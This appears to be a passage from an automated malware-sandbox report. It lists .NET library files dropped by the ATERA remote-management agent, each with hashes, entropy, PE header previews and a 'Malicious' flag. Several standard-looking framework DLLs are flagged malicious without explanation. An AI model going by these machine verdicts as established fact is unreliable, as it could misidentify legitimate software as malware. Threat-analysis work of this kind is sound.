                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):31784
                                                                                                                                                                                                                                        Entropy (8bit):6.537237080993636
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Bu5I+sqOylryry8qqIfUc7a5eMEpYi60mn:BYIVBpry8qqIfUcm5eF76Nn
                                                                                                                                                                                                                                        MD5:78E831E0FDCBBD349EB80E7A717FF355
                                                                                                                                                                                                                                        SHA1:32F3B7DF1D94BC98D62DA15944F477863AD6BF0F
                                                                                                                                                                                                                                        SHA-256:338B234FCDBAE4D7E19DC237DA559AFDE50D21A81192C0AFACDF2AD055BFF8FF
                                                                                                                                                                                                                                        SHA-512:136DD7189F40A4C67629C2D45BF80F611C63BE6AF586AB8975DD627729A935CEF0EC31193585436677C5DF34E28BFFF0691D4682439612431A603B4A0183E0AA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..F...........d... ........... ....................................@..................................c..O.......x............T..((...........c............................................... ............... ..H............text....D... ...F.................. ..`.rsrc...x............H..............@..@.reloc...............R..............@..B.................c......H........&...7...........^.......b......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rK..p.(....*2ry..p.(....*2r...p.(....*2r...p.(....*2rc..p.(....*......(....*..0..;........|....(......./......(....o....s

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.876786974883989
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Ovn4HREpWiQWtIANyb8E9VF6IYijSJIVxeWDdL7TD0:BS/I4EpYi60nk
                                                                                                                                                                                                                                        MD5:352884106780AA616929ED1AD0577C31
                                                                                                                                                                                                                                        SHA1:AF6D887BBB0C92D35ED59F3777C0D2583E75062C
                                                                                                                                                                                                                                        SHA-256:4B6A835E273EFC191EB1C0A55DF63409EA281D035FECEF02622F92363BE940C1
                                                                                                                                                                                                                                        SHA-512:CFB65C378EFC302E37A2AD2AFA6B8DC9DCAF7E39EA2994022DDEFEB86F575D05CC29F02B991E3F123B1933DA6CFFEFE86117F03AEAEBEAC015237B68D60CA9D3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................7.....@..................................(..O....@..P...............((...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................n.....B.....".....V.................U...........$.....m...........?.....(...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.77027842758303
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:78MjKb47T3UCcqFMkJ59WdtWcnNyb8E9VF6IYijSJIVxoQO:gMjKb4vcGdO7LEpYi60+
                                                                                                                                                                                                                                        MD5:BB0B262A1E19497B8617D5C54CA274D7
                                                                                                                                                                                                                                        SHA1:B079BAAACFD3CA4236A567F1095AE6D642885BE9
                                                                                                                                                                                                                                        SHA-256:BB2FD944A31A8D2D3C8D0234F59D8167C4455C0B3C130019C45BAD8CD1F66C74
                                                                                                                                                                                                                                        SHA-512:FD0CD25A69805E12BD44914711BA12416C36A661732973131C8FB394FE15DEAC2F80EE10F3467D03C08B306CC55B9FFA39AEC741580144DE51B111CFBBA0C029
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ..............................ZZ....@.................................`,..O....@..................((...`......(+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ..X....................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3................................!.....O.......................................].....z.............................7.......j...........n...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8552515980726705
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:OzyNXd4+BW6FWqkNyb8E9VF6IYijSJIVxDYheFI/:3ztEEpYi60cQI/
                                                                                                                                                                                                                                        MD5:5888BA6BDDA6697B8F718C2DA08893A0
                                                                                                                                                                                                                                        SHA1:3F1168B27ACA1B65B28AE808C24DC4A0CE410B2B
                                                                                                                                                                                                                                        SHA-256:4091E50AF61775BC11F9E2FB4D6C2C282DD3A2267CFA9109F00A14C8755C5CF4
                                                                                                                                                                                                                                        SHA-512:6B37D628EDC968054AC44585AD7879EC45DE6D68BD62C88DCEF0FE48972CD1121F4311726D3C022C71DDB413563979913A40E652AED467A0050796EC01244F56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................\.....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...p...#Strings............#US.........#GUID...........#Blob......................3..................................................'.....'...T.....G.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.862846916378626
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zvs2Q3HKJNrWWRWfUANyb8E9VF6IYijSJIVxm8MHN:zuM0xEpYi60PGN
                                                                                                                                                                                                                                        MD5:140000726444F6AF5359A562BDB552BB
                                                                                                                                                                                                                                        SHA1:7C8EFA451F889F1B104AABDF9E8E30D59CA9F379
                                                                                                                                                                                                                                        SHA-256:07D6A00E63F24C3AD8E8B5A620E4BCCCF5A64B25C5A53C3140253F776F4E0A4A
                                                                                                                                                                                                                                        SHA-512:841C0185C12BE5D6A49EC2362439FE9605AB53914C096423FAD34E48783010AA62FC71060D904A506792E6F9E83F6084C065C7807F874245DF0D8348840F0B4B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..4...............((...`......h'............................................... ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....p.......#US.t.......#GUID...........#Blob......................3................................................../...q./...E.....O.....Y.................X...........'.....p...........B.....+...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.829096685601233
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:mFz0Q6gcqRhcsMWdMW+kNyb8E9VF6IYijSJIVx9JtOZ/R:mFz1c60EEpYi60LqR
                                                                                                                                                                                                                                        MD5:3B8709DB32BE67BCD75859A4CC55D3AB
                                                                                                                                                                                                                                        SHA1:56EAF23919EB9370032A246A74E9669740E64691
                                                                                                                                                                                                                                        SHA-256:977FD5826719F24285FADC540C0F7B74053E7B9B724D160BF884681DC85077CF
                                                                                                                                                                                                                                        SHA-512:4AEFC904647119CFE002CE787DF5463816ABA97BEA8548F10ACB7DEE8D69CBDDF2FD252C44C491AAAE40404B611D262B14D42B3A6BAB36AC47C2FC67FC7DD8B7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................N.....@.................................L(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..D....................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings.... .......#US.$.......#GUID...4.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.725331273299116
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:r6xWA3W4aW/NWQvNyb8E9VF6IYijSJIVxIJZGV:raB/TEpYi609
                                                                                                                                                                                                                                        MD5:53092591BE1262409A40F8FA5C0C2B09
                                                                                                                                                                                                                                        SHA1:A4E823FC42B13218AB9B1EE75502833ACAE32DB7
                                                                                                                                                                                                                                        SHA-256:F5E828D4DD748A67D2B1E18E69BA3EC9D26070C5ACB1B57D9A70D535AD038735
                                                                                                                                                                                                                                        SHA-512:34BA74A4991FCBB2A711921012DE590B50CD347A79E0ADAB4C6B4A63C72FDBAD783BA582D70A0B4C2C7044AF04BF658657BB744865D8BB32E6454E805703786B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ..............................l.....@..................................+..O....@..................((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .......................*......................................BSJB............v4.0.30319......l... ...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................-.........O.k.....k.....X.....................1...........o.........................B...........9...........J.....J.....J...).J...1.J...9.J...A.J...I.J...Q.J...Y.J...a.J...i.J...q.J.......................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73256
                                                                                                                                                                                                                                        Entropy (8bit):5.9528236640882195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:X784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAsk76nRf:X7N1r9KGI04CCAskwRf
                                                                                                                                                                                                                                        MD5:29A6127FCF6139A25AF8693179D46AED
                                                                                                                                                                                                                                        SHA1:6165AAB80873FD7C46F04023D10801C7D736A21A
                                                                                                                                                                                                                                        SHA-256:F7FF2F322A27C3832B25EDDEEAA2DC54CB466D1F53C598C1295D6D9B6283A796
                                                                                                                                                                                                                                        SHA-512:A4201388AFD38FDD392D64422EDAB439884A163B663A83053B2F46C7330682742B9650EC5337A43547BD681EEE6E4CF5BD89D6E3A3F889DC0A24F5B2B3694D9D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......$....@.....................................O.... ..P...............((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.854768377208066
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3r97WquW6/Nyb8E9VF6IYijSJIVxkp9VUc6K:3RJKDEpYi60elB
                                                                                                                                                                                                                                        MD5:60882D71149BBE641AE5BA05E8B60BEC
                                                                                                                                                                                                                                        SHA1:08A84CD2C479BA1877D74E628DE4545B33C61CB0
                                                                                                                                                                                                                                        SHA-256:BC2E11F2DB69BE3F3556AA6A59E5E31A9E970E464DE51626BDE6A5DED469A0EF
                                                                                                                                                                                                                                        SHA-512:6035F1AA55C8B2B286D12E457B7324D4C90B0BC3F863C86B5B7476A50324552A2D2099D6EAFC54D346C17CC9B04B6DB52634F7A3FC185B2FF4F5074E99915FB1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............+... ...@....... ...............................h....@.................................\+..O....@..................((...`......$*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ..T....................)......................................BSJB............v4.0.30319......l.......#~..T.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................z...........j.....j.....W...............B.....z.............................................................Q.....Q.....Q...).Q...1.Q...9.Q...A.Q...I.Q...Q.Q...Y.Q...a.Q...i.Q...q.Q.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.792441439661817
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:316eWLDWGoNyb8E9VF6IYijSJIVx4OtciP:l6LbAEpYi60r5P
                                                                                                                                                                                                                                        MD5:2F9706BC54DC610C8047C5187F26FBD6
                                                                                                                                                                                                                                        SHA1:2CFF1A2D481B8F191BA651ECF4D1583FF707C428
                                                                                                                                                                                                                                        SHA-256:CADF8DBBDDEDE96C06C47817B98A834119D4C831295B0FFF48708F1B70DBBCDD
                                                                                                                                                                                                                                        SHA-512:E95A6A7020D43BF41498C565C47DED8D057C7106DE50506D51E9F6A09F6AF2F5D306B71D778AC7F52CAA01CFD2A9F1A1467A8A061A36CB8A01E23E266B1FC73E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............*... ...@....... ...............................l....@.................................|*..O....@..................((...`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16936
                                                                                                                                                                                                                                        Entropy (8bit):6.786390980413795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:O8G4YC2W+wW8WpwWU4Nyb8E9VF6IYijSJIVxPFD:BGZ5OwEpYi60V
                                                                                                                                                                                                                                        MD5:3C9610222E9B847F102AB330F085ECBC
                                                                                                                                                                                                                                        SHA1:9DA03826DEF2D8F7F8EE1A4FA16A4D8A0CC1493D
                                                                                                                                                                                                                                        SHA-256:A081FCE69771198389D32AAC400D6567654815595F836395EBEE17377661470D
                                                                                                                                                                                                                                        SHA-512:2C1D103B3E6D5DBEF62CF2C8156B8B45136CE572FEDAFE03A3178C02EAFEC524D275766E2C1823CAE95BFDD08D8CCC76954450CE58F13D444E7A35B686C1120C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ...............................w....@.................................z+..O....@..x...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P*........................................s....*:.(......}....*2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.898555778840737
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:M6ziqTEkGWvRWH1Nyb8E9VF6IYijSJIVxKPgdo8sq:MYT1cREpYi600T8T
                                                                                                                                                                                                                                        MD5:B6D36F988DE6DD6209F22AF582B4E939
                                                                                                                                                                                                                                        SHA1:CB28B1A9813DE047E691679820630E27FF0C939D
                                                                                                                                                                                                                                        SHA-256:5685B6F7A4B5D64DE5A9E9F05D56BA5B577882E87125A64B9246DC8F5D0011BF
                                                                                                                                                                                                                                        SHA-512:C867B99984CBCCB31F3D9BAEA8D2079C202FC7E54E224A44895CC4E00D80DBC433EF1B0A1CAFB7E00B3B926E601EB051C11588C05C40AF6AA396F000EA6EBE4E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ...............................S....@..................................)..O....@..................((...`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.808946442672549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:9Uv7c7iWNCWq0Nyb8E9VF6IYijSJIVxILAkdT:9M7c1m0EpYi600zl
                                                                                                                                                                                                                                        MD5:1F659D5017DAFFA15E3672898335F7C1
                                                                                                                                                                                                                                        SHA1:36359E0EA40902900A2540126FB35BF8D4A9F963
                                                                                                                                                                                                                                        SHA-256:DC731D628134FB040EE094E75A0CD8F2D5FE8C211A7A468635DE20A7297C7FC5
                                                                                                                                                                                                                                        SHA-512:B5FF6AD7DD57CBD20F51D0D159971E09A1A3781E3CA477355252BBFB695D5118C7423E719426BF68AB4C06E97C8E1AF5BF9A992C03535C78E72C6596A4CFD862
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............*... ...@....... ..............................*.....@..................................*..O....@..................((...`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.852070312826578
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:T+vxmNWnRW5TPMNyby2sE9jBF6IYiYF85S35IVnxGUHF8C8nz6Ub:iSWnRWJ0Nyb8E9VF6IYijSJIVxI3Bb
                                                                                                                                                                                                                                        MD5:8618BC9691BDBD9CED63DDC44F752CA1
                                                                                                                                                                                                                                        SHA1:1C6931790DE77D4D7D2C632DB16A7A4D9AF3C06B
                                                                                                                                                                                                                                        SHA-256:F6241E4B1496804B81B5FF21DE6B73B660858D226BEE8A38BFAA24D4706F1584
                                                                                                                                                                                                                                        SHA-512:C73739A1CE07F56BB9106C5B528FA22ED57C92BCA1442D1D2E12F60D77024EE851229F9E1048B29F3764A5881C002463C9F06F03DCDA3301E5BD6265464F721F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... ..............................V.....@.................................L+..O....@..$...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (337), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5166
                                                                                                                                                                                                                                        Entropy (8bit):5.050534959945823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rkgmgcvg0Q/gnSi++aPGl7p7Al4gnSi++aPGl7p7Ac:+TVL/N7c9L/N79
                                                                                                                                                                                                                                        MD5:B42F49D12DD7FAEA77129DAE131FEEF1
                                                                                                                                                                                                                                        SHA1:121D726A800C8AD53D894F07A0E10E957AD8EF17
                                                                                                                                                                                                                                        SHA-256:200F0C1973A0107F1A70CA3528E89528C7F3924983D6CFF436CE280F35D77119
                                                                                                                                                                                                                                        SHA-512:38DAE0AD4FFB11CA8B5875C613714F2395D23016D2A3939424CEE7DB4E874FFC29C8ED91B273D3D928DF5D468E04E1D4949CD404A43B404140770085CC5C1E3A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
